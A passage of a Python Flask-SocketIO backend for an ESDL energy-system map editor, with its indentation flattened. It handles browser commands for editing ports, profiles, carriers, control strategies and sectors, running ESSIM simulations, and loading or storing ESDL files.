point = esdl.Point(lat=coord['lat'], lon=coord['lng'])
exterior.point.append(point)
prev_lat = coord['lat']
prev_lng = coord['lng']
i += 1
area = es_edit.instance[0].area
area_selected = ESDLEnergySystem.find_area(area, area_bld_id)
if area_selected:
area_selected.geometry = polygon
else:
bld_selected = ESDLAsset.find_asset(area, area_bld_id)
if bld_selected:
bld_selected.geometry = polygon
else:
send_alert('SERIOUS ERROR: set_area_bld_polygon - connot find area or building')
if message['cmd'] == 'split_conductor':
cond_id = message['id']
mode = message['mode'] # connect, add_joint, no_connect
location_to_split = message['location']
area = es_edit.instance[0].area
conductor, container = ESDLAsset.find_asset_and_container(area, cond_id)
split_conductor(conductor, location_to_split, mode, container)
if message['cmd'] == 'get_port_profile_info':
port_id = message['port_id']
asset = get_asset_from_port_id(esh, active_es_id, port_id)
if asset:
ports = asset.port
for p in ports:
if p.id == port_id:
profile = p.profile
if profile:
profile_info_list = generate_profile_info(profile)
emit('port_profile_info', {'port_id': port_id, 'profile_info': profile_info_list})
else:
emit('port_profile_info', {'port_id': port_id, 'profile_info': []})
if message['cmd'] == 'add_profile_to_port':
port_id = message['port_id']
profile_class = message['profile_class']
quap_type = message["qaup_type"]
if profile_class == 'SingleValue':
value = message['value']
esdl_profile = esdl.SingleValue()
esdl_profile.value = str2float(value)
elif profile_class == 'DateTimeProfile':
esdl_profile = esdl.DateTimeProfile()
# TODO: Determine how to deal with DateTimeProfiles in the UI
else:
# Assume all other options are InfluxDBProfiles
multiplier = message['multiplier']
profiles = Profiles.get_instance().get_profiles()['profiles']
for pkey in profiles:
p = profiles[pkey]
if p['profile_uiname'] == profile_class:
esdl_profile = esdl.InfluxDBProfile()
esdl_profile.multiplier = str2float(multiplier)
esdl_profile.measurement = p['measurement']
esdl_profile.field = p['field']
if 'host' in p and p['host']:
esdl_profile.host = p['host']
if 'port' in p and p['port']:
esdl_profile.port = int(p['port'])
else:
esdl_profile.host = settings.profile_database_config['protocol'] + "://" + \
settings.profile_database_config['host']
esdl_profile.port = int(settings.profile_database_config['port'])
esdl_profile.database = p['database']
esdl_profile.filters = settings.profile_database_config['filters']
if 'start_datetime' in p:
dt = parse_date(p['start_datetime'])
if dt:
esdl_profile.startDate = EDate.from_string(str(dt))
else:
send_alert('Invalid datetime format')
if 'end_datetime' in p:
dt = parse_date(p['end_datetime'])
if dt:
esdl_profile.endDate = EDate.from_string(str(dt))
else:
send_alert('Invalid datetime format')
if quap_type == 'predefined_qau':
# socket.emit('command', {cmd: 'add_profile_to_port', port_id: port_id, value: profile_mult_value,
# profile_class: profile_class, quap_type: qaup_type, predefined_qau: predefined_qau});
predefined_qau = message["predefined_qau"]
for pqau in esdl_config.esdl_config['predefined_quantity_and_units']:
if pqau['id'] == predefined_qau:
try:
# check if predefined qau is already present in the ESDL
qau = esh.get_by_id(active_es_id, predefined_qau)
except KeyError:
qau = ESDLQuantityAndUnits.build_qau_from_dict(pqau)
esi_qau = ESDLQuantityAndUnits.get_or_create_esi_qau(esh, active_es_id)
esi_qau.quantityAndUnit.append(qau)
esh.add_object_to_dict(active_es_id, qau)
#qau.id = str(uuid.uuid4()) # generate new id for predifined qua otherwise double ids appear
break
# make a reference instead of a direct link
qau_ref = esdl.QuantityAndUnitReference(reference=qau)
esdl_profile.profileQuantityAndUnit = qau_ref
elif quap_type == 'custom_qau':
# socket.emit('command', {cmd: 'add_profile_to_port', port_id: port_id, value: profile_mult_value,
# profile_class: profile_class, quap_type: qaup_type, custom_qau: custom_qau});
custom_qau = message["custom_qau"]
qau = ESDLQuantityAndUnits.build_qau_from_dict(custom_qau)
esdl_profile.profileQuantityAndUnit = qau
elif quap_type == 'profiletype':
# socket.emit('command', {cmd: 'add_profile_to_port', port_id: port_id, value: profile_mult_value,
# profile_class: profile_class, quap_type: qaup_type, profile_type: profile_type});
profile_type = message['profile_type']
esdl_profile.profileType = esdl.ProfileTypeEnum.from_string(profile_type)
esdl_profile.id = str(uuid.uuid4())
esh.add_object_to_dict(es_edit.id, esdl_profile)
asset = get_asset_from_port_id(esh, active_es_id, port_id)
if asset:
ports = asset.port
for p in ports:
if p.id == port_id:
# p.profile = esdl_profile
ESDLAsset.add_profile_to_port(p, esdl_profile)
if message['cmd'] == 'remove_profile_from_port':
port_id = message['port_id']
profile_id = message['profile_id']
asset = get_asset_from_port_id(esh, active_es_id, port_id)
if asset:
ports = asset.port
for p in ports:
if p.id == port_id:
# p.profile = esdl_profile
ESDLAsset.remove_profile_from_port(p, profile_id)
if message['cmd'] == 'add_port' or message['cmd'] == 'add_port_with_id':
# merge add_port and add_port_with_id. Why on earth were there two messages for the same thing!
# frontend should be adapted to only send one of these: todo
# ptype and direction do the same thing!
asset_id = message['asset_id']
pname = message['pname']
pid = str(uuid.uuid4())
if 'pid' in message:
pid = message['pid']
if 'ptype' in message:
ptype = message['ptype']
if 'direction' in message:
direction = message['direction']
ptype = 'InPort' if direction == 'in' else 'OutPort'
asset = esh.get_by_id(es_edit.id, asset_id)
if ptype == 'InPort':
port = esdl.InPort(id=pid, name=pname)
else:
port = esdl.OutPort(id=pid, name=pname)
geom = asset.geometry
if len(asset.port) >= 6:
send_alert('ERROR: MapEditor cannot visualize assets with more than 6 ports.')
if isinstance(geom, esdl.Line) and len(asset.port) >= 2:
send_alert('ERROR: Line geometries cannot have more than two ports.')
elif isinstance(geom, esdl.Line) and len(asset.port) == 1 and asset.port[0].eClass.name == ptype:
send_alert('ERROR: Line cannot have ports of the same type.')
else:
if isinstance(geom, esdl.Line) and isinstance(port, esdl.InPort):
asset.port.insert(0, port) # insert InPort always at beginning as this is the convention
else:
asset.port.append(port)
esh.add_object_to_dict(active_es_id, port)
port_list = []
for p in asset.port:
port_list.append(
{'name': p.name, 'id': p.id, 'type': type(p).__name__, 'conn_to': [p.id for p in p.connectedTo]})
emit('update_asset', {'asset_id': asset.id, 'ports': port_list})
if message['cmd'] == 'remove_port':
pid = message['port_id']
asset = get_asset_from_port_id(esh, active_es_id, pid)
ports = asset.port
port_list = []
for p in set(ports):
if p.id == pid:
esh.remove_object_from_dict(active_es_id, p, recursive=True)
ports.remove(p) # remove from list
p.delete() # delete from esdl (e.g. if other ports refer to this port, they will be updated)
# question is why is this necessary in pyecore and isn't this done automatically
# as p is not contained anymore and you get dangling references.
else:
carrier_id = p.carrier.id if p.carrier else None
port_list.append({'name': p.name, 'id': p.id, 'type': type(p).__name__, 'conn_to': [pt.id for pt in p.connectedTo], 'carrier': carrier_id})
emit('update_asset', {'asset_id': asset.id, 'ports': port_list})
if message['cmd'] == 'remove_connection_portids':
from_port_id = message['from_port_id']
from_port = esh.get_by_id(es_edit.id, from_port_id)
to_port_id = message['to_port_id']
to_port = esh.get_by_id(es_edit.id, to_port_id)
from_port.connectedTo.remove(to_port)
from_asset_id = from_port.eContainer().id
to_asset_id = to_port.eContainer().id
# refresh connections in gui
active_es_id = get_session('active_es_id')
conn_list = get_session_for_esid(active_es_id, 'conn_list')
new_list = []
#print(conn_list)
for conn in conn_list:
if (conn['from-port-id'] != from_port_id or conn['from-asset-id'] != from_asset_id or
conn['to-port-id'] != to_port_id or conn['to-asset-id'] != to_asset_id) and \
(conn['from-port-id'] != to_port_id or conn['from-asset-id'] != to_asset_id or
conn['to-port-id'] != from_port_id or conn['to-asset-id'] != from_asset_id):
# Remove both directions from -> to and to -> from as we don't know how they are stored in the list
# does not matter, as a connection is unique
new_list.append(conn) # add connections that we are not interested in
else:
print(' - removed {}'.format(conn))
set_session_for_esid(active_es_id, 'conn_list', new_list) # set new connection list
# TODO: send es.id with this message?
emit('clear_connections') # clear current active layer connections
emit('add_connections', {'es_id': active_es_id, 'conn_list': new_list})
if message['cmd'] == 'remove_connection':
# socket.emit('command', {cmd: 'remove_connection', from_asset_id: from_asset_id, from_port_id: from_port_id,
# to_asset_id: to_asset_id, to_port_id: to_port_id});
from_asset_id = message['from_asset_id']
from_port_id = message['from_port_id']
from_port = esh.get_by_id(es_edit.id, from_port_id)
to_asset_id = message['to_asset_id']
to_port_id = message['to_port_id']
to_port = esh.get_by_id(es_edit.id, to_port_id)
from_port.connectedTo.remove(to_port)
# refresh connections in gui
active_es_id = get_session('active_es_id')
conn_list = get_session_for_esid(active_es_id, 'conn_list')
new_list = []
#print(conn_list)
for conn in conn_list:
if (conn['from-port-id'] != from_port_id or conn['from-asset-id'] != from_asset_id or \
conn['to-port-id'] != to_port_id or conn['to-asset-id'] != to_asset_id) and \
(conn['from-port-id'] != to_port_id or conn['from-asset-id'] != to_asset_id or \
conn['to-port-id'] != from_port_id or conn['to-asset-id'] != from_asset_id):
# Remove both directions from -> to and to -> from as we don't know how they are stored in the list
# does not matter, as a connection is unique
new_list.append(conn) # add connections that we are not interested in
else:
print(' - removed {}'.format(conn))
set_session_for_esid(active_es_id, 'conn_list', new_list) # set new connection list
# TODO: send es.id with this message?
emit('clear_connections') # clear current active layer connections
emit('add_connections', {'es_id': active_es_id, 'conn_list': new_list})
if message['cmd'] == 'set_carrier':
asset_id = message['asset_id']
carrier_id = message['carrier_id']
area = es_edit.instance[0].area
if asset_id:
asset = ESDLAsset.find_asset(area, asset_id)
num_ports = len(asset.port)
if isinstance(asset, esdl.Transport) or num_ports == 1:
set_carrier_for_connected_transport_assets(asset_id, carrier_id)
else:
send_alert("Error: Can only start setting carriers from transport assets or assets with only one port")
update_carrier_conn_list()
if message['cmd'] == 'add_carrier':
# en_carr: socket.emit('command', {cmd: 'add_carrier', type: carr_type, name: carr_name, emission: carr_emission, encont: carr_encont, encunit: carr_encunit});
# el_comm: socket.emit('command', {cmd: 'add_carrier', type: carr_type, name: carr_name, voltage: carr_voltage});
# g_comm: socket.emit('command', {cmd: 'add_carrier', type: carr_type, name: carr_name, pressure: carr_pressure});
# h_comm: socket.emit('command', {cmd: 'add_carrier', type: carr_type, name: carr_name, suptemp: carr_suptemp, rettemp: carr_rettemp});
# en_comm: socket.emit('command', {cmd: 'add_carrier', type: carr_type, name: carr_name});
carr_type = message['type']
carr_name = message['name']
carr_id = str(uuid.uuid4())
if carr_type == 'en_carr':
carr_emission = message['emission']
carr_encont = message['encont']
carr_encunit = message['encunit'] # MJpkg MJpNm3 MJpMJ
carr_sofm = message['sofm']
carr_rentype = message['rentype']
carrier = esdl.EnergyCarrier(id = carr_id, name = carr_name, emission = str2float(carr_emission),
energyContent = str2float(carr_encont), energyCarrierType = carr_rentype, stateOfMatter = carr_sofm)
if carr_encunit == 'MJpkg':
encont_qandu=esdl.QuantityAndUnitType(
physicalQuantity=esdl.PhysicalQuantityEnum.ENERGY,
multiplier=esdl.MultiplierEnum.MEGA,
unit=esdl.UnitEnum.JOULE,
perMultiplier=esdl.MultiplierEnum.KILO,
perUnit=esdl.UnitEnum.GRAM)
elif carr_encunit == 'MJpNm3':
encont_qandu=esdl.QuantityAndUnitType(
physicalQuantity=esdl.PhysicalQuantityEnum.ENERGY,
multiplier=esdl.MultiplierEnum.MEGA,
unit=esdl.UnitEnum.JOULE,
perUnit=esdl.UnitEnum.CUBIC_METRE)
elif carr_encunit == 'MJpMJ':
encont_qandu=esdl.QuantityAndUnitType(
physicalQuantity=esdl.PhysicalQuantityEnum.ENERGY,
multiplier=esdl.MultiplierEnum.MEGA,
unit=esdl.UnitEnum.JOULE,
perMultiplier=esdl.MultiplierEnum.MEGA,
perUnit=esdl.UnitEnum.JOULE)
emission_qandu=esdl.QuantityAndUnitType(
physicalQuantity=esdl.PhysicalQuantityEnum.EMISSION,
multiplier=esdl.MultiplierEnum.KILO,
unit=esdl.UnitEnum.GRAM,
perMultiplier=esdl.MultiplierEnum.GIGA,
perUnit=esdl.UnitEnum.JOULE)
carrier.energyContentUnit = encont_qandu
carrier.emissionUnit = emission_qandu
if carr_type == 'el_comm':
carr_voltage = message['voltage']
carrier = esdl.ElectricityCommodity(id=carr_id, name=carr_name, voltage=str2float(carr_voltage))
if carr_type == 'g_comm':
carr_pressure = message['pressure']
carrier = esdl.GasCommodity(id=carr_id, name=carr_name, pressure=str2float(carr_pressure))
if carr_type == 'h_comm':
carr_suptemp = message['suptemp']
carr_rettemp = message['rettemp']
carrier = esdl.HeatCommodity(id=carr_id, name=carr_name, supplyTemperature=str2float(carr_suptemp), returnTemperature=str2float(carr_rettemp))
if carr_type == 'en_comm':
carrier = esdl.EnergyCarrier(id=carr_id, name=carr_name)
esh.add_object_to_dict(es_edit.id, carrier) # add carrier to ID list for easy retrieval
esi = es_edit.energySystemInformation
if not esi:
esi_id = str(uuid.uuid4())
esi = esdl.EnergySystemInformation()
esi.id = esi_id
es_edit.energySystemInformation = esi
esh.add_object_to_dict(es_edit.id, esi)
ecs = esi.carriers
if not ecs:
ecs_id = str(uuid.uuid4())
ecs = esdl.Carriers(id=ecs_id)
esi.carriers = ecs
esh.add_object_to_dict(es_edit.id, ecs)
ecs.carrier.append(carrier)
carrier_list = ESDLEnergySystem.get_carrier_list(es_edit)
emit('carrier_list', {'es_id': es_edit.id, 'carrier_list': carrier_list})
return True
if message['cmd'] == 'remove_carrier':
carrier_id = message['carrier_id']
carrier = esh.get_by_id(es_edit.id, carrier_id)
carrier.delete()
conn_list = get_session_for_esid(es_edit.id, 'conn_list')
for c in conn_list:
if c['from-port-carrier'] == carrier_id:
c['from-port-carrier'] = None
if c['to-port-carrier'] == carrier_id:
c['to-port-carrier'] = None
emit('clear_connections') # clear current active layer connections
emit('add_connections', {'es_id': es_edit.id, 'conn_list': conn_list})
if message['cmd'] == 'get_storage_strategy_info':
asset_id = message['asset_id']
mcc, mdc = get_storage_marginal_costs(asset_id)
emit('storage_strategy_window', {'asset_id': asset_id, 'mcc': mcc, 'mdc': mdc})
if message['cmd'] == 'get_curtailment_strategy_info':
asset_id = message['asset_id']
max_power = get_curtailment_max_power(asset_id)
emit('curtailment_strategy_window', {'asset_id': asset_id, 'max_power': max_power})
if message['cmd'] == 'set_control_strategy':
# socket.emit('command', {'cmd': 'set_control_strategy', 'strategy': control_strategy, 'asset_id': asset_id, 'port_id': port_id});
strategy = message['strategy']
asset_id = message['asset_id']
if strategy == 'StorageStrategy':
mcc = message['marg_ch_costs']
mdc = message['marg_disch_costs']
add_storage_control_strategy_for_asset(asset_id, mcc, mdc)
elif strategy == 'CurtailmentStrategy':
max_power = message['max_power']
add_curtailment_control_strategy_for_asset(asset_id, max_power)
else:
port_id = message['port_id']
add_drivenby_control_strategy_for_asset(asset_id, strategy, port_id)
if message['cmd'] == 'remove_control_strategy':
asset_id = message['asset_id']
remove_control_strategy_for_asset(asset_id)
if message['cmd'] == 'set_marginal_costs_get_info':
asset_id = message['asset_id']
mc = get_marginal_costs_for_asset(asset_id)
emit('marginal_costs', {'asset_id': asset_id, 'mc': mc})
if message['cmd'] == 'set_marg_costs':
asset_id = message['asset_id']
mc = str2float(message['marg_costs'])
set_marginal_costs_for_asset(asset_id, mc)
if message['cmd'] == 'layer':
pass
if message['cmd'] == 'run_ESSIM_simulation':
logger.debug('ESSIM simulation command received')
sim_descr = message['sim_description']
sim_start_datetime = message['sim_start_datetime']
sim_end_datetime = message['sim_end_datetime']
essim_kpis = message['essim_kpis']
essim_loadflow = message['essim_loadflow']
# Create the HTTP POST to start the simulation
if not essim.run_simulation(sim_descr, sim_start_datetime, sim_end_datetime, essim_kpis, essim_loadflow):
emit('simulation_not_started')
if message['cmd'] == 'validate_for_ESSIM':
logger.debug('validation for ESSIM command received')
res = validate_ESSIM(es_edit)
emit('results_validation_for_ESSIM', res)
# if message['cmd'] == 'calculate_ESSIM_KPIs':
# session['simulationRun'] = '5d10f273783bac5eff4575e8'
# ESSIM_config = settings.essim_config
#
# simulation_run = get_session('simulationRun')
# if simulation_run:
#
# active_simulation = get_session('active_simulation')
# if active_simulation:
# sdt = datetime.strptime(active_simulation['startDate'], '%Y-%m-%dT%H:%M:%S%z')
# edt = datetime.strptime(active_simulation['endDate'], '%Y-%m-%dT%H:%M:%S%z')
# else:
# send_alert('No active_simulation! This should not happen, please report. However, you can continue')
# sdt = datetime.strptime(ESSIM_config['start_datetime'], '%Y-%m-%dT%H:%M:%S%z')
# edt = datetime.strptime(ESSIM_config['end_datetime'], '%Y-%m-%dT%H:%M:%S%z')
#
# influxdb_startdate = sdt.strftime('%Y-%m-%dT%H:%M:%SZ')
# influxdb_enddate = edt.strftime('%Y-%m-%dT%H:%M:%SZ')
#
# calc_ESSIM_KPIs.submit(es_edit, simulation_run, influxdb_startdate, influxdb_enddate)
# else:
# send_alert('No simulation id defined - run an ESSIM simulation first')
if message['cmd'] == 'add_layer':
id = message['id']
descr = message['descr']
url = message['url']
name = message['name']
setting_type = message['setting_type']
project_name = message['project_name']
legend_url = message['legend_url']
visible = message['visible']
layer = {
"description": descr,
"url": url,
"layer_name": name,
"setting_type": setting_type,
"project_name": project_name,
"legend_url": legend_url,
"layer_ref": None,
"visible": visible
}
wms_layers.add_wms_layer(id, layer)
if message['cmd'] == 'remove_layer':
id = message['id']
wms_layers.remove_wms_layer(id)
if message['cmd'] == 'get_es_info':
attributes = [
{"id": 1, "name": "Energysystem name", "value": es_edit.name},
{"id": 2, "name": "Energysystem description", "value": es_edit.description}
]
emit('show_es_info', attributes)
if message['cmd'] == 'set_es_info_param':
id = message['id']
value = message['value']
if id == "1":
es_edit.name = value
if id == "2":
es_edit.description = value
es_edit.description = value
if message['cmd'] == 'add_sector':
name = message['name']
descr = message['descr']
code = message['code']
ESDLEnergySystem.add_sector(es_edit, name, code, descr)
sector_list = ESDLEnergySystem.get_sector_list(es_edit)
emit('sector_list', {'es_id': es_edit.id, 'sector_list': sector_list})
if message['cmd'] == 'remove_sector':
id = message['id']
esh = get_handler()
ESDLEnergySystem.remove_sector(es_edit, id)
sector_list = ESDLEnergySystem.get_sector_list(es_edit)
emit('sector_list', {'es_id': es_edit.id, 'sector_list': sector_list})
if message['cmd'] == 'set_sector':
asset_id = message['asset_id']
sector_id = message['sector_id']
instance = es_edit.instance
area = instance[0].area
asset = ESDLAsset.find_asset(area, asset_id)
esi = es_edit.energySystemInformation
sectors = esi.sectors
sector = sectors.sector
for s in sector:
if s.id == sector_id:
asset.sector = s
if message['cmd'] == 'get_edr_asset':
edr_asset_id = message['edr_asset_id']
edr_asset_str = edr_assets.get_asset_from_EDR(edr_asset_id)
if edr_asset_str:
edr_asset = ESDLAsset.load_asset_from_string(edr_asset_str)
edr_asset_name = edr_asset.name
edr_asset_type = type(edr_asset).__name__
edr_asset_cap = get_asset_capability_type(edr_asset)
emit('place_edr_asset', edr_asset_type)
set_session('adding_edr_assets', edr_asset_str)
recently_used_edr_assets = get_session('recently_used_edr_assets')
if recently_used_edr_assets:
current_edr_asset_in_list = False
for edra in recently_used_edr_assets:
if edra['edr_asset_id'] == edr_asset_id:
current_edr_asset_in_list = True
if not current_edr_asset_in_list and len(recently_used_edr_assets) == 5:
recently_used_edr_assets.pop() # Remove last element
if not current_edr_asset_in_list:
recently_used_edr_assets.insert(0, {
'edr_asset_id': edr_asset_id,
'edr_asset_name': edr_asset_name,
'edr_asset_type': edr_asset_type,
'edr_asset_cap': edr_asset_cap,
'edr_asset_str': edr_asset_str
})
else:
recently_used_edr_assets = list()
recently_used_edr_assets.append({
'edr_asset_id': edr_asset_id,
'edr_asset_name': edr_asset_name,
'edr_asset_type': edr_asset_type,
'edr_asset_cap': edr_asset_cap,
'edr_asset_str': edr_asset_str
})
set_session('recently_used_edr_assets', recently_used_edr_assets)
emit('recently_used_edr_assets', recently_used_edr_assets)
else:
send_alert('Error getting ESDL model from EDR')
if message['cmd'] == 'set_asset_drawing_mode':
mode = message['mode']
set_session('asset_drawing_mode', mode)
if mode == 'empty_assets':
set_session('adding_edr_assets', None)
set_session('asset_from_measure_id', None)
if mode == 'edr_asset':
edr_asset_info = message['edr_asset_info']
# If you select an asset from the EDR directly, ESDL string is cached.
# AssetDrawToolbar EDR assets that are stored in mongo, do not have the ESDL string stored.
if 'edr_asset_str' not in edr_asset_info:
edr_asset_id = edr_asset_info['edr_asset_id']
edr_asset_info['edr_asset_str'] = edr_assets.get_asset_from_EDR(edr_asset_id)
set_session('adding_edr_assets', edr_asset_info['edr_asset_str'])
if mode == 'asset_from_measures':
asset_from_measure_id = message['asset_from_measure_id']
set_session('asset_from_measure_id', asset_from_measure_id)
if message['cmd'] == 'query_esdl_service':
params = message['params']
logger.debug("received query_esdl_service command with params: {}".format(params))
query_esdl_services.submit(params)
if message['cmd'] == 'redraw_connections': # set_carrier_color
# this is called when a carrier color is changed and the gui needs to be refreshed
# best would be to do this fully in the front end (no changes in the ESDL model)
# but that does not contain enough information yet to do this.
conn_list = get_session_for_esid(active_es_id, 'conn_list')
emit('clear_connections') # clear current active layer connections
emit('add_connections', {'es_id': active_es_id, 'conn_list': conn_list})
asset_list = get_session_for_esid(active_es_id, 'asset_list')
emit('clear_ui', {'layer': 'assets'}) # clear current active layer assets
emit('add_esdl_objects', {'es_id': active_es_id, 'asset_pot_list': asset_list, 'zoom': False})
if message['cmd'] == 'building_editor':
bld_id = message['id']
building = esh.get_by_id(active_es_id, bld_id)
bld_info = get_building_information(building)
emit('building_information', bld_info)
emit('add_esdl_objects',
{'es_id': active_es_id, 'add_to_building': True, 'asset_pot_list': bld_info["asset_list"],
'zoom': False})
emit('add_connections', {'es_id': active_es_id, 'add_to_building': True, 'conn_list': bld_info["conn_list"]})
if message['cmd'] == 'accept_received_esdl':
user_email = get_session('user-email')
received_esdls = esdl_api.get_esdl_for_user(user_email)
if received_esdls:
for received_esdl in received_esdls:
filename = 'ESDL from '+received_esdl['sender']
esh = get_handler()
try:
result, parse_info = esh.add_from_string(name=filename, esdl_string=urllib.parse.unquote(received_esdl['esdl']))
if len(parse_info) > 0:
info = ''
for line in parse_info:
info += line + "\n"
send_alert("Warnings while opening {}:\n\n{}".format(filename, info))
call_process_energy_system.submit(esh, filename) # run in seperate thread
esdl_api.remove_esdls_for_user(user_email)
except Exception as e:
logger.error("Error loading {}: {}".format(filename, e))
send_alert('Error interpreting ESDL from file - Exception: ' + str(e))
if message['cmd'] == 'rename_energysystem':
name = message['name']
rename_es_id = message['remame_es_id']
es_rename = esh.get_energy_system(es_id=rename_es_id)
es_rename.name = name
if message['cmd'] == 'remove_energysystem':
remove_es_id = message['remove_es_id']
esh.remove_energy_system(es_id=remove_es_id)
if message['cmd'] == 'refresh_esdl':
print('refresh_esdl')
esh = get_handler()
call_process_energy_system.submit(esh, force_update_es_id=es_edit.id, zoom=False) # run in seperate thread
set_handler(esh)
session.modified = True
@executor.job
def query_esdl_services(params):
esh = get_handler()
logger.debug('calling service')
try:
esdl_service_ok, esdl_service_result = esdl_services.call_esdl_service(params)
except Exception as exc:
logger.exception("Exception when querying ESDL service")
esdl_service_ok = False
esdl_service_result = str(exc)
logger.debug('emitting result to browser')
if esdl_service_ok:
if esdl_service_result is not None:
emit('esdl_service_result', esdl_service_result)
else:
message = 'Error calling service'
if isinstance(esdl_service_result, str):
message += ': ' + esdl_service_result
send_alert(message)
# logger.debug('processing energy system')
call_process_energy_system.submit(esh)
@socketio.on('set_active_es_id', namespace='/esdl')
def set_active_es_id(id):
set_session('active_es_id', id)
logger.debug("========== Setting active es_id to {} =============".format(id))
# ---------------------------------------------------------------------------------------------------------------------
# React on commands from the browser (add, remove, ...)
# ---------------------------------------------------------------------------------------------------------------------
@socketio.on('file_command', namespace='/esdl')
def process_file_command(message):
logger.info('received: ' + message['cmd'])
es_info_list = get_session("es_info_list")
if message['cmd'] == 'new_esdl':
name = message['name']
description = message['description']
instance_name = message['instance_name']
top_area_name = message['top_area_name']
if name == '': name = 'New Energy System'
if instance_name == '': instance_name = 'Untitled instance'
if top_area_name == '': top_area_name = 'Untitled area'
filename = 'Unknown'
esh = EnergySystemHandler()
es = esh.create_empty_energy_system(name, description, instance_name, top_area_name, esdlVersion=esdl_doc.get_esdl_version())
es_info_list = {}
set_session("es_info_list", es_info_list)
emit('clear_ui')
emit('clear_esdl_layer_list')
call_process_energy_system.submit(esh, filename)
del_session('store_item_metadata')
emit('store_item_metadata', {})
set_session('active_es_id', es.id)
set_session('es_filename', filename)
if message['cmd'] == 'load_esdl_from_file':
file_content = message['file_content']
filename = message['filename']
esh = EnergySystemHandler()
try:
result, parse_info = esh.load_from_string(esdl_string=file_content, name=filename)
if len(parse_info) > 0:
info = ''
for line in parse_info:
info += line + "\n"
send_alert("Warnings while opening {}:\n\n{}".format(filename, info))
except Exception as e:
logger.exception(f"Error opening {filename}")
send_alert("Error opening {}. Exception is: {}".format(filename, e))
emit('clear_ui')
return
es = esh.get_energy_system()
set_handler(esh)
es_info_list = {}
set_session("es_info_list", es_info_list)
emit('clear_ui')
emit('clear_esdl_layer_list')
call_process_energy_system.submit(esh, filename) # run in seperate thread
#thread = threading.Thread(target=process_energy_system, args=(esh, None, None, current_app._get_current_object() ))
#thread.start()
del_session('store_item_metadata')
emit('store_item_metadata', {})
set_session('active_es_id', es.id)
set_session('es_filename', filename)
if message['cmd'] == 'import_esdl_from_file':
file_content = message['file_content']
filename = message['filename']
esh = get_handler()
try:
imported_es, parse_info = esh.add_from_string(name=filename, esdl_string=file_content)
if len(parse_info) > 0:
info = ''
for line in parse_info:
info += line + "\n"
send_alert("Warnings while opening {}:\n\n{}".format(filename, info))
call_process_energy_system.submit(esh, filename) # run in seperate thread
set_session('active_es_id', imported_es.id)
set_session('es_filename', filename)
except Exception as e:
logger.error("Error loading {}: {}".format(filename, e))
send_alert('Error interpreting ESDL from file - Exception: ' + str(e))
if message['cmd'] == 'get_list_from_store':
role = get_session('user-role')
if 'mondaine' in role:
store_url = mondaine_hub_url + 'tagged?tag=map&take=1000'
else:
store_url = default_store_url+ 'tagged?tag=map&take=1000'
try:
result = requests.get(store_url)
except Exception as e:
logger.error('Error accessing ESDL store' + str(e))
send_alert('Error accessing ESDL store' + str(e))
return
data = result.json()
store_list = []
for store_item in data:
store_list.append({'id': store_item['id'], 'title': store_item['title']})
sorted_store_list = sorted(store_list, key=lambda x: x['title'], reverse=False)
emit('store_list', sorted_store_list)
if message['cmd'] == 'load_esdl_from_store':
store_id = message['id']
esh = load_ESDL_EnergySystem(store_id)
if esh:
es = esh.get_energy_system()
if es.name:
title = 'Store name: ' + es.name + ', store id: ' + store_id
else:
title = 'Store id: ' + store_id
set_session('active_es_id', es.id)
set_session('es_filename', title) # TODO: separate filename and title
es_info_list = {}
set_session("es_info_list", es_info_list)
emit('clear_ui')
emit('clear_esdl_layer_list')
call_process_energy_system.submit(esh, None, title)
else:
send_alert('Error loading ESDL file with id {} from store'.format(store_id))
if message['cmd'] == 'import_esdl_from_store':
store_id = message['id']
imported_es = import_ESDL_EnergySystem(store_id)
if imported_es:
if imported_es.name:
title = 'Store name: ' + imported_es.name + ', store id: ' + store_id
else:
title = 'Store id: ' + store_id
esh = get_handler()
call_process_energy_system.submit(esh, None, title) # run in seperate thread
set_session('active_es_id', imported_es.id)
set_session('es_filename', title)
if message['cmd'] == 'store_esdl':
title = message['store_title']
descr = message['store_descr']
email = message['store_email']
tags = ['map']
esh = get_handler()
store_item_metadata = get_session('store_item_metadata')
if store_item_metadata:
store_id = store_item_metadata['id']
update_store_item(store_id, title, descr, email, tags, esh)
else:
store_id = get_session('active_es_id')
create_new_store_item(store_id, title, descr, email, tags, esh)
# Do not store file_content in logging database
if 'file_content' in message:
del message['file_content']
user_email = get_session('user-email')
user_actions_logging.store_logging(user_email, "file-command", message['cmd'], json.dumps(message), "", {})
# if message['cmd'] == 'save_esdl':
# esh = get_handler()
# try:
# write_energysystem_to_file('./static/EnergySystem.esdl', esh)
# # TODO: do we need to flush??
# emit('and_now_press_download_file')
# except Exception as e:
# send_alert('Error saving ESDL file to filesystem - exception: '+str(e))
# if message['cmd'] == 'download_esdl':
# esh = get_handler()
# name = get_session('es_title').replace(' ', '_')
#
# send_ESDL_as_file(esh, name)
# ---------------------------------------------------------------------------------------------------------------------
# Connect from browser
# - initialize energysystem information
# - send info to browser
# ---------------------------------------------------------------------------------------------------------------------
def initialize_app():
session.permanent = True
logger.info('Client connected: {}'.format(request.sid))
if 'client_id' in session:
logger.info('Energysystem in memory - reloading client data')
esh = get_handler()
else:
logger.info('No energysystem in memory - generating empty energysystem')
esh = EnergySystemHandler()
esh.create_empty_energy_system('Untitled EnergySystem', '', 'Untitled Instance', 'Untitled Area',
esdlVersion=esdl_doc.get_esdl_version())
# TODO: discuss how to set active_es_id for the first time after a client connects
es_list = esh.get_energy_systems()
if es_list:
last_es = es_list[-1]
set_session('active_es_id', last_es.id)
else:
logger.error("No energy systems in esh list - Edwin and Ewoud discuss!!")
es_info_list = {}
set_session("es_info_list", es_info_list)
emit('clear_ui')
emit('clear_esdl_layer_list')
call_process_energy_system.submit(esh, None, None) # run in a seperate thread
@socketio.on('connect', namespace='/esdl')
def connect():
logger.info("Websocket connection established")
if 'id' in session:
logger.debug('- Old socketio id={}, new socketio id={}'.format(session['id'], request.sid))
else:
logger.debug('- Old socketio id={}, new socketio id={}'.format(None, request.sid))
session['id'] = request.sid
set_session('socketio_sid', request.sid)
# Client ID is used to retrieve session variables in handler_manager
# So this is a very important session variable!!
if 'client_id' in session:
logger.debug('- Client id: {}'.format(session['client_id']))
else:
logger.debug('- No client id in session')
if not valid_session():
send_alert("Session has timed out, please refresh")
def get_qau_information():
qau_info = dict()
qau_info['generic'] = ESDLQuantityAndUnits.get_qau_information()
qau_info['profile_type_enum_values'] = ESDLQuantityAndUnits.get_profile_type_enum_values()
qau_info['predefined_qau'] = esdl_config.esdl_config['predefined_quantity_and_units']
return qau_info
def get_carrier_color_dict():
me_settings = MapEditorSettings.get_instance()
me_ui_setting = me_settings.get_system_setting(MAPEDITOR_UI_SETTINGS)
if me_ui_setting:
